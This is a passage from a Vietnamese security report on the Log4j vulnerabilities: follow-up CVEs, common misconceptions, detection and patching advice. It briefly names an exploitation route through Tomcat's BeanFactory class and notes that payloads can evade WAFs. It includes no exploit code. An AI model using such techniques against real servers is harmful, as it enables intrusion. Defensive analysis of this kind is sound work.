đến việc khai thác việc sử dụng JNDI. Cụ thể: 


4.3.1. CVE-2021-45046 


Mức độ nghiêm trọng: cao 
Điểm CVSS: 9/10 


Bản vá đầu tiên dành cho lỗ hổng log4j 2.14.1 CVE-2021-44228 (log4j 2.15.0) 
không được hoàn chỉnh do chưa kiểm soát được một vài trường hợp cấu hình, do 
đó module JNDI vẫn bị lợi dụng, dẫn đến tình trạng từ chối dịch vụ (DOS), đôi khi 
tệ hơn là thực thi code từ xa (RCE) trên vài môi trường như MacOS, Fedora, Arch 
Linux, and Alpine Linux [13]. 


4.3.2. CVE-2021-45105 

Mức độ nghiêm trọng: trung bình 

Điểm CVSS: 5.9/10 

Bản vá tiếp theo cho lỗ hổng CVE-2021-45046 tiếp tục có vấn đề với module JNDI. 


Với những cấu hình thủ công dành cho log4j, một kẻ tấn công có thể gây ra tình 
trạng từ chối dịch vụ [13]. 


4.3.3. CVE-2021-44832 
Mức độ nghiêm trọng: trung bình 
FEEEE=E=ẼỄ——==—Ễễẽễẽễ....ò. 
23 


Điểm CVSS: 6.6/10 


Apache Log4j phiên bản 2.0-beta7 đến 2.17.0 có thể bị khai thác RCE nếu file cấu 
hình của log4j có chứa tham chiếu JDBC (một module tương tác với cơ sở dữ liệu) 
đến một nguồn data trỏ tới địa chỉ server LDAP. Lỗ hổng này có thể dẫn tới việc 
thực thi code từ xa, nhưng phải có điều kiện kẻ tấn công có quyền sửa file cấu 
hình log4j. 


4.3.4. Nhận xét 

Do việc sử dụng JNDI để khai thác còn khá “mới” trong cộng đồng nghiên cứu bảo 
mật, CyRadar dự đoán trong thời gian tới, ngoài log4j2, sẽ có nhiều hơn những 
thư viện, ứng dụng bị phát hiện chứa lỗ hổng liên quan. 


5. Phòng tránh, xử lý mối nguy 
Để phòng tránh việc bị tấn công thông qua con đường khai thác CVE-2021-44228, 
chúng ta cần nắm rõ những điều sau: 


5.1. Tìm hiểu thông tin từ những nguồn đáng tin cậy 
Sau đây là những lời khuyên sai lầm được thấy trên nhiều diễn đàn, bài viết về lỗ 
hổng CVE-2021-44228. 


5.1.1. “Chỉ một vài phiên bản Java bị ảnh hưởng” 

Có nhiều báo cáo cho rằng chỉ một vài phiên bản Java bị ảnh hưởng bởi lỗ hổng, 
cụ thể là những phiên bản trước JDK 1.8u191 (do hoạt động của JNDI thay đổi 
theo từng phiên bản), nhưng theo chuyên gia Michael Stepankin đến từ công ty 
Veracode, chúng ta hoàn toàn có thể khai thác lỗ hổng này thông qua việc khởi 
tạo một class cục bộ (nằm trong classpath của chương trình), cụ thể là hàm 
“org.apache.naming.factory.BeanFactory” của Apache Tomcat Server [2]. 


5.1.2. “WAF có thể phòng tránh việc khai thác” 

Không có một cách đơn giản để lọc ra những request độc hại do payload khai thác 
CVE-2021-44228 có thể bị làm rối một cách tinh vi. Cách an toàn nhất là thực hiện 
những biện pháp được đề xuất dưới đây. 
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5.2. Kiểm tra nếu ứng dụng của mình có chứa lỗ hổng 
Nếu ứng dụng được viết bằng Java, Scala, Groovy, Clojure hay Kotlin, nó đều sẽ có 
nguy cơ bị dính lỗ hổng. Có thể sử dụng những cách sau đây để kiểm tra. 


5.2.1. Sử dụng công cụ quét tự động do LunaSec cung cấp 
Download công cụ tại đường dẫn: 


https://github.com/lunasec-io/lunasec/releases 
Cách sử dụng: 
® trên Linux và macOS: 


log4shell scan <đường_ dẫn_ project> 


® trên Windows: 


log4shell.exe scan <đường_ dẫn _project> 


5.2.2. Quét thủ công 

Nếu project đã được đóng gói (chỉ có một file .jar), sử dụng công cụ như javac để 
dịch ngược package. Kiểm tra version của dependency log4j.jar, nếu version 
<2.17.1 thì cần cập nhật. 


Nếu project chưa được đóng gói, tìm file log4j.jar và kiểm tra version như trên. 


5.3. Cách phòng tránh 

Nếu sử dụng một cách trực tiếp, chúng ta nên cập nhật log4j2 lên phiên bản mới 
nhất (2.17.1), hoặc nếu sử dụng log4j2 một cách gián tiếp (thông qua Apache web 
server, Ghidra, Minecraft server,...), chúng ta nên cập nhật những ứng dụng trên 
lên phiên bản mới nhất. 


6. Kết luận 

Trên đây là bài phân tích lỗ hổng lỗ hổng thuộc thư viện log4j với mã định danh 
CVE-2021-44228. Qua bài viết, chúng ta có thể thấy cách khai thác lỗ hổng trên 

khá đơn giản, khả năng thành công cao. Đó là lý do lỗ hổng này có điểm CVSS là 

10/10. Do sự phổ biến của thư viện log4j2, một số lượng khổng lồ các máy chủ 

trên thế giới nói chung và Việt Nam nói riêng đang bị đặt dưới nguy cơ tấn công. 

FEEEEE=  - — ẼỄễẼỄẼEEỄễỄễẼễẼễẼỄẼễẼễẼỄẼễẼễẼễẼễẼễẼễỄễỄẸ—ẸẼÃễ—ễỄễEễỄẼễEễỄễỄễỄ ễ=ễễễễễÃễỄä: 
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Trên thực tế, đã và đang có hàng chục nghìn các cuộc tấn công nhằm vào điểm 

yếu trên. Vì thế, chúng ta cần nhanh chóng rà soát lỗ hổng, cập nhật phần mềm 
trên các máy chủ lên những phiên bản mới nhất để tránh việc bị rò rỉ, đánh cắp 
thông tin. 
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